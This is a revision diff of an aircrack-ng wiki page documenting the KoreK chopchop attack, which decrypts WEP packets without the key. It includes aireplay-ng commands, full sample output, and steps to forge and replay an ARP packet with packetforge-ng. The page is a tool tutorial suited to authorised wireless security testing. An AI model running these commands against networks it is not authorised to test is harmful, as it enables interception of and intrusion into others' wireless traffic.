User Tools

Site Tools


korek_chopchop

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Next revision
Previous revision
korek_chopchop [2006/11/19 16:12]
jeroenimo
korek_chopchop [2009/06/02 19:24]
mister_x Fixed packetforge command (thanks wims)
Line 1: Line 1:
 ====== KoreK chopchop ====== ====== KoreK chopchop ======
-This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. //This attack does not recover the WEP key itself, but merely reveals the plaintext//​. However, some access points are not vulnerable at all. Some may seem vulnerable at first but actually drop data packets shorter that 60 bytes. If the access point drops packets shorter than 42 bytes, aireplay tries to guess the rest of the missing data, as far as the headers are predictable. If an IP packet is captured, it additionally checks if the checksum of the header is correct after guessing the missing parts of it. This attack requires at least one WEP data packet. 
  
 +
 +===== Description =====
 +This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. //This attack does not recover the WEP key itself, but merely reveals the plaintext//​. However, some access points are not vulnerable to this attack. Some may seem vulnerable at first but actually drop data packets shorter that 60 bytes. If the access point drops packets shorter than 42 bytes, aireplay tries to guess the rest of the missing data, as far as the headers are predictable. If an IP packet is captured, it additionally checks if the checksum of the header is correct after guessing the missing parts of it. This attack requires at least one WEP data packet.
 +
 +If you wish to learn more about the theory behind this attack, see [[ChopchopTheory]].
 +
 +
 +===== Usage =====
 +
 +   ​aireplay-ng -4 -h 00:​09:​5B:​EC:​EE:​F2 -b 00:​14:​6C:​7E:​40:​80 ath0
 +
 +Where:
 +  *-4 means the chopchop attack
 +  *-h 00:​09:​5B:​EC:​EE:​F2 is the MAC address of an associated client or your card's MAC if you did fake authentication
 +  * -b 00:​14:​6C:​7E:​40:​80 is the access point MAC address
 +  *ath0 is the wireless interface name
 +
 +Although it is not shown, you may use any of the other [[aireplay-ng]] filters. ​ The main page of [[aireplay-ng]] has the complete list.  Additional typical filters could be the -m and -n to set the minimum and maximum packet sizes to select.
 +
 +If the "​-h"​ option is omitted, then a unauthenticated chopchop attack is performed. ​ See the example below for more details.
 +
 +
 +===== Usage Examples =====
 +
 +
 +
 +==== Example with sample output ====
 +
 +This is an example an authenticated chopchop attack. ​ Meaning you must first perform a fake authentication and use the source MAC with the "​-h"​ option. ​ Essentially this causes all packets to be sent with the source MAC specified by "​-h"​ and the destination MAC will  vary with 256 combinations.
 +
 +   ​aireplay-ng -4 -h 00:​09:​5B:​EC:​EE:​F2 -b 00:​14:​6C:​7E:​40:​80 ath0
 +
 +Where:
 +  *-4 means the chopchop attack
 +  *-h 00:​09:​5B:​EC:​EE:​F2 is the MAC address of our card and must match the MAC used in the fake authentication
 +  * -b 00:​14:​6C:​7E:​40:​80 is the access point MAC address
 +  *ath0 is the wireless interface name
 +
 +The system responds:
 +
 +        Read 165 packets...
 +  ​
 +           Size: 86, FromDS: 1, ToDS: 0 (WEP)
 +   
 +           ​BSSID ​ =  00:​14:​6C:​7E:​40:​80
 +           Dest. MAC  =  FF:​FF:​FF:​FF:​FF:​FF
 +           ​Source MAC  =  00:​40:​F4:​77:​E5:​C9
 +   
 +           ​0x0000: ​ 0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.
 +           ​0x0010: ​ 0040 f477 e5c9 603a d600 0000 5fed a222  .@.w..`:​...._.."​
 +           ​0x0020: ​ e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543  ...H......._=..C
 +           ​0x0030: ​ d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873  ....j.....%.[.(s
 +           ​0x0040: ​ 16d4 43fb aebb 3ea1 7101 729e 65ca 6905  ..C...>​.q.r.e.i.
 +           ​0x0050: ​ cfeb 4a72 be46                           ​..Jr.F
 +  ​
 +   Use this packet ? y
 +
 +You respond "​y"​ above and the system continues.
 +
 +   ​Saving chosen packet in replay_src-0201-191639.cap
 +   
 +   ​Offset ​  85 ( 0% done) | xor = D3 | pt = 95 |  253 frames written in   760ms
 +   ​Offset ​  84 ( 1% done) | xor = EB | pt = 55 |  166 frames written in   498ms
 +   ​Offset ​  83 ( 3% done) | xor = 47 | pt = 35 |  215 frames written in   645ms
 +   ​Offset ​  82 ( 5% done) | xor = 07 | pt = 4D |  161 frames written in   483ms
 +   ​Offset ​  81 ( 7% done) | xor = EB | pt = 00 |   12 frames written in    36ms
 +   ​Offset ​  80 ( 9% done) | xor = CF | pt = 00 |  152 frames written in   456ms
 +   ​Offset ​  79 (11% done) | xor = 05 | pt = 00 |   29 frames written in    87ms
 +   ​Offset ​  78 (13% done) | xor = 69 | pt = 00 |  151 frames written in   454ms
 +   ​Offset ​  77 (15% done) | xor = CA | pt = 00 |   24 frames written in    71ms
 +   ​Offset ​  76 (17% done) | xor = 65 | pt = 00 |  129 frames written in   387ms
 +   ​Offset ​  75 (19% done) | xor = 9E | pt = 00 |   36 frames written in   108ms
 +   ​Offset ​  74 (21% done) | xor = 72 | pt = 00 |   39 frames written in   117ms
 +   ​Offset ​  73 (23% done) | xor = 01 | pt = 00 |  146 frames written in   438ms
 +   ​Offset ​  72 (25% done) | xor = 71 | pt = 00 |   83 frames written in   249ms
 +   ​Offset ​  71 (26% done) | xor = A1 | pt = 00 |   43 frames written in   129ms
 +   ​Offset ​  70 (28% done) | xor = 3E | pt = 00 |   98 frames written in   294ms
 +   ​Offset ​  69 (30% done) | xor = BB | pt = 00 |  129 frames written in   387ms
 +   ​Offset ​  68 (32% done) | xor = AE | pt = 00 |  248 frames written in   744ms
 +   ​Offset ​  67 (34% done) | xor = FB | pt = 00 |  105 frames written in   315ms
 +   ​Offset ​  66 (36% done) | xor = 43 | pt = 00 |  101 frames written in   303ms
 +   ​Offset ​  65 (38% done) | xor = D4 | pt = 00 |  158 frames written in   474ms
 +   ​Offset ​  64 (40% done) | xor = 16 | pt = 00 |  197 frames written in   591ms
 +   ​Offset ​  63 (42% done) | xor = 7F | pt = 0C |   72 frames written in   217ms
 +   ​Offset ​  62 (44% done) | xor = 1F | pt = 37 |  166 frames written in   497ms
 +   ​Offset ​  61 (46% done) | xor = 5C | pt = A8 |  119 frames written in   357ms
 +   ​Offset ​  60 (48% done) | xor = 9B | pt = C0 |  229 frames written in   687ms
 +   ​Offset ​  59 (50% done) | xor = 91 | pt = 00 |  113 frames written in   339ms
 +   ​Offset ​  58 (51% done) | xor = 25 | pt = 00 |  184 frames written in   552ms
 +   ​Offset ​  57 (53% done) | xor = 94 | pt = 00 |   33 frames written in    99ms
 +   ​Offset ​  56 (55% done) | xor = F3 | pt = 00 |  193 frames written in   579ms
 +   ​Offset ​  55 (57% done) | xor = D6 | pt = 00 |   17 frames written in    51ms
 +   ​Offset ​  54 (59% done) | xor = FA | pt = 00 |   81 frames written in   243ms
 +   ​Offset ​  53 (61% done) | xor = EA | pt = 01 |   95 frames written in   285ms
 +   ​Offset ​  52 (63% done) | xor = 5D | pt = 37 |   24 frames written in    72ms
 +   ​Offset ​  51 (65% done) | xor = 33 | pt = A8 |   20 frames written in    59ms
 +   ​Offset ​  50 (67% done) | xor = CC | pt = C0 |   97 frames written in   291ms
 +   ​Offset ​  49 (69% done) | xor = 03 | pt = C9 |  188 frames written in   566ms
 +   ​Offset ​  48 (71% done) | xor = 34 | pt = E5 |   48 frames written in   142ms
 +   ​Offset ​  47 (73% done) | xor = 34 | pt = 77 |   64 frames written in   192ms
 +   ​Offset ​  46 (75% done) | xor = 51 | pt = F4 |  253 frames written in   759ms
 +   ​Offset ​  45 (76% done) | xor = 98 | pt = 40 |  109 frames written in   327ms
 +   ​Offset ​  44 (78% done) | xor = 3D | pt = 00 |  242 frames written in   726ms
 +   ​Offset ​  43 (80% done) | xor = 5E | pt = 01 |  194 frames written in   583ms
 +   ​Offset ​  42 (82% done) | xor = AF | pt = 00 |   99 frames written in   296ms
 +   ​Offset ​  41 (84% done) | xor = C4 | pt = 04 |  164 frames written in   492ms
 +   ​Offset ​  40 (86% done) | xor = CE | pt = 06 |   69 frames written in   207ms
 +   ​Offset ​  39 (88% done) | xor = 9D | pt = 00 |  137 frames written in   411ms
 +   ​Offset ​  38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms
 +   ​Offset ​  37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms
 +   ​Offset ​  36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms
 +   ​Offset ​  35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms
 +   Sent 957 packets, current guess: B9...
 +   
 +   The AP appears to drop packets shorter than 35 bytes.
 +   ​Enabling standard workaround: ARP header re-creation.
 +   
 +   ​Saving plaintext in replay_dec-0201-191706.cap
 +   ​Saving keystream in replay_dec-0201-191706.xor
 +   
 +   ​Completed in 21s (2.29 bytes/s)
 +
 +Success! ​ The file "​replay_dec-0201-191706.xor"​ above can then be used in the next step to generate a packet with [[packetforge-ng]] such as an arp packet. ​ You may also use tcpdump or Wireshark to view the decrypted packet which is stored in replay_dec-0201-191706.cap.
 +
 +
 +==== Chopchop Without Authentication ====
 +
 +This is an example of chopchop attack without authentication. ​ Meaning you do not need to perform a fake authentication first and you omit the "​-h"​ option. ​ Essentially this causes all packets to be sent with the 256 random source MAC addresses and a broadcast destination MAC.
 +
 +This only works with a very limited number Access Points (AP).  For APs which are vulnerable, they will only send a deauthentication packet if the source packet was valid. ​ If this is the case, then one byte has been successfully determined.
 +
 +   ​aireplay-ng -4 -b 00:​14:​6C:​7E:​40:​80 ath0
 +
 +Where:
 +  *-4 means the chopchop attack
 +  * -b 00:​14:​6C:​7E:​40:​80 is the access point MAC address
 +  *ath0 is the wireless interface name
 +
 +
 +==== Generating an ARP packet ====
  
 1. First, we decrypt one packet 1. First, we decrypt one packet
Line 20: Line 159:
 The source IP (192.168.1.100) doesn'​t matter, but the destination IP (192.168.1.2) must respond to ARP requests. The source MAC must belong to an associated station, in case the access point is filtering unauthenticated traffic. The source IP (192.168.1.100) doesn'​t matter, but the destination IP (192.168.1.2) must respond to ARP requests. The source MAC must belong to an associated station, in case the access point is filtering unauthenticated traffic.
  
-      ​arpforge-ng replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 00:​09:​5B:​EB:​C5:​2B 192.168.1.100 192.168.1.arp.cap+      ​packetforge-ng --00:14:6C:7E:40:80 -h 00:​09:​5B:​EB:​C5:​2B ​-k 192.168.1.2 -l 192.168.1.100 -y replay_dec-0627-022301.xor -w arp.cap
  
 4. And replay our forged ARP request 4. And replay our forged ARP request
Line 26: Line 165:
       aireplay-ng -2 -r arp.cap ath0       aireplay-ng -2 -r arp.cap ath0
  
-See [[ChopchopTheory]]+ 
 + 
 +===== Usage Tips ===== 
 + 
 +When to say no to a packet? ​ You may ask if there are times when you should say "​no"​ to selecting a specific packet. ​ Here are some examples of when you might say no: 
 + 
 +  * The packet length was too short and you wanted/​needed PRGA longer then the packet length. 
 +  * You were looking to decrypt a packet to/from a specific client and you would wait for   a packet to/from that client MAC address. 
 +  * You may want to purposely pick a short packet. ​ The reason being that the decryption time is linear to the length of the packet. ​ IE Small packets take less time. 
 + 
 + 
 + 
 + 
 +===== Usage Troubleshooting ===== 
 + 
 +Also see the general aireplay-ng troubleshooting ideas: ​[[aireplay-ng#​usage_troubleshooting|aireplay-ng usage troubleshooting]]
 + 
 +Although not a direct troubleshooting tip for the chopchop attack, if you are unable to get the attack to work, there are some alternate attacks you should consider: 
 + 
 +  * [[fragmentation|Fragmentation Attack]]: This is an alternate technique to obtain PRGA for building packets for subsequent injection. 
 +  * [[interactive_packet_replay#​other_examples|-p 0841 method]]: This technique allows you to reinject any data packet received from the access point and generate IVs. 
 + 
korek_chopchop.txt · Last modified: 2009/06/02 19:24 by mister_x